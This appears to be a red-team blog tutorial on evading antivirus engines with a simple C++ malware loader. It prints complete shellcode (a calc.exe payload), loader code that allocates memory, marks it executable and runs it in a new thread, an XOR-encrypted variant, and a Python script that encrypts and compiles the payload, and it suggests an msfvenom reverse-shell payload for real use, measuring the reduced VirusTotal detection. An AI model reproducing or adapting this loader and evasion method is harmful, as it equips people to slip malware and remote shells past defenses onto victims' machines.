AV engines evasion for C++ simple malware
﷽
Hello, cybersecurity enthusiasts and white hackers!
This is not a tutorial to make a malware, but a practical case for educational purpose only.
AV evasion has always being challenging for red teamers and pentesters, especially for those who write malwares.
In our tutorial, we will write a simple malware in C++ that will launch our payload: calc.exe
process. Then we check through virustotal how many AV engines detect our malware, after which we will try to reduce the number of AV engines that will detect our malware.
Let’s start with simple C++ code of our malware:
/*
cpp implementation malware example with calc.exe payload
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// our payload calc.exe
unsigned char my_payload[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
unsigned int my_payload_len = sizeof(my_payload);
int main(void) {
void * my_payload_mem; // memory buffer for payload
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
my_payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// copy payload to buffer
RtlMoveMemory(my_payload_mem, my_payload, my_payload_len);
// make new buffer as executable
rv = VirtualProtect(my_payload_mem, my_payload_len, PAGE_EXECUTE_READ, &oldprotect);
if ( rv != 0 ) {
// run payload
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) my_payload_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
So we have just one function main(void)
function:
and we have sizeof(my_payload)
size of payload.
For simplicity, we use calc.exe
as the payload. Without delving into the generation of the payload, we will simply substitute the finished payload into our code:
unsigned char my_payload[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72,
0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1,
0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44,
0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48,
0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5,
0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0,
0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
And the main logic of our main
function is:
Let’s go to investigate this logic. If you want to run our payload in the memory of the process, we have to do couple of things. We have to create a new memory buffer, copy our payload into the buffer, and a start executing this buffer.
The first we do we allocate new memory region in a process and we store the address in my_payload_mem
variable:
and this memory region is readable and writeable.
Then, we copy our my_payload
to my_payload_mem
:
And then we set our buffer to be executable:
Ok, everything is good but why I am not doing this in 44
line???
why not just allocate a buffer which is readable writable and executable?
And the reason is pretty simple. Some hunting tools and AV engines can spot this memory region, because it’s quite unusable that the process needs a memory which is readable, writeable and executable at the same time. So to bypass this kind of detection we are doing in a two steps.
And if everything goes well, we run our payload as the separate new thread in a process:
Let’s go to compile our malware:
and run (on Windows 10 x64):
So basically this is how you can store your payload in a .text
section without encryption.
Let’s go to upload our evil.exe
to Virustotal:
So, 22 of of 66 AV engines detect our file as malicious.
Let’s go to try to reduce the number of AV engines that will detect our malware.
For this first we must encrypt our payload. Why we want to encrypt our payload? The basic purpose of doing this to hide you payload from someone like AV engine or reverse engineer. So that reverse engineer cannot easily identify your payload.
The purpose of encryption is the transform data in order to keep it secret from others. For simplicity, we use XOR encryption for our case.
Let’s take a look at how to use XOR to encrypt and decrypt our payload.
Update our simple malware code:
/*
cpp implementation malware example with calc.exe payload encrypted via XOR
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// our payload calc.exe
unsigned char my_payload[] = {};
unsigned int my_payload_len = sizeof(my_payload);
// key for XOR decrypt
char my_secret_key[] = "mysupersecretkey";
// decrypt deXOR function
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
int j;
j = 0;
for (int i = 0; i < data_len; i++) {
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
int main(void) {
void * my_payload_mem; // memory buffer for payload
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
my_payload_mem = VirtualAlloc(0, my_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Decrypt (DeXOR) the payload
XOR((char *) my_payload, my_payload_len, my_secret_key, sizeof(my_secret_key));
// copy payload to buffer
RtlMoveMemory(my_payload_mem, my_payload, my_payload_len);
// make new buffer as executable
rv = VirtualProtect(my_payload_mem, my_payload_len, PAGE_EXECUTE_READ, &oldprotect);
if ( rv != 0 ) {
// run payload
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) my_payload_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}
The main difference with our first simple implementation is - we add XOR decrypt function and our secret key my_secret_key
for decryption:
It’s actually simple function, it’s a symmetric encryption, we can use it for encryption and decryption with the same key.
and we deXOR our payload before copy to buffer:
And the only missing thing is our payload:
which should be encrypted with XOR.
For that create simple python script which encrypt payload and replace it in our C++ template:
import sys
import os
import hashlib
import string
## XOR function to encrypt data
def xor(data, key):
key = str(key)
l = len(key)
output_str = ""
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
ordd = lambda x: x if isinstance(x, int) else ord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str
## encrypting
def xor_encrypt(data, key):
ciphertext = xor(data, key)
ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };'
print (ciphertext)
return ciphertext, key
## key for encrypt/decrypt
my_secret_key = "mysupersecretkey"
## payload calc.exe
plaintext = open("./calc.bin", "rb").read()
ciphertext, p_key = xor_encrypt(plaintext, my_secret_key)
## open and replace our payload in C++ code
tmp = open("evil_xor.cpp", "rt")
data = tmp.read()
data = data.replace('unsigned char my_payload[] = { };', 'unsigned char my_payload[] = ' + ciphertext)
tmp.close()
tmp = open("evil-enc.cpp", "w+")
tmp.write(data)
tmp.close()
## compile
try:
cmd = "x86_64-w64-mingw32-gcc evil-enc.cpp -o evil.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc >/dev/null 2>&1"
os.system(cmd)
except:
print ("error compiling malware template :(")
sys.exit()
else:
print (cmd)
print ("successfully compiled :)")
For simplicity, we use calc.bin
payload:
but in real scenario you can use something like:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.1.6 LPORT=4444 -f raw -o hack.bin
run python script:
python3 evil_enc.py
and run in victim’s machine (Windows 10 x64):
Let’s go to upload our new evil.exe
with encrypted payload to Virustotal:
So, we have reduced the number of AV engines which detect our malware from 22 to 18!
In the next part, I will write how else you can reduce the number of detections using function call obfuscation technique.
Thanks for your time, and good bye!
PS. All drawings and screenshots are mine